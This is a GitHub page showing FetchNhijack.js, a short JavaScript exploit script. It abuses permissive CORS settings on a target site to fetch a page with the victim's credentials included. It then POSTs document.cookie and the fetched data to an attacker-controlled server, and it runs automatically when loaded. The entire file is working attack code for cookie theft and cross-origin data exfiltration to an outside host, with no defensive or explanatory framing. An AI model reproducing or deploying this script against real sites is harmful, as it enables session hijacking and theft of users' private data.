-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathFetchNhijack.js
29 lines (25 loc) · 1.06 KB
/
FetchNhijack.js
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
// Define the URL of the target where `crossdomain.xml` or CORS settings are permissive
const targetUrl = 'http://example.pro/index.php';
// Define the attacker's server where you want to send the cookies
const attackerUrl = 'http://exmaple.pro/receive_cookies';
// Function to fetch and send cookies to the attacker's server
function exploitCORSAndSendCookies() {
fetch(targetUrl, {
method: 'GET',
credentials: 'include' // Ensures cookies are included in the request
})
.then(response => response.text()) // Assuming we want to see the response text
.then(data => {
console.log('Data received:', data);
fetch(attackerUrl, {
method: 'POST',
body: JSON.stringify({cookies: document.cookie, data: data}),
headers: {'Content-Type': 'application/json'}
})
.then(response => console.log('Cookies sent to attacker’s server'))
.catch(error => console.error('Error sending cookies:', error));
})
.catch(error => console.error('Error fetching data:', error));
}
// Run the exploit function
exploitCORSAndSendCookies();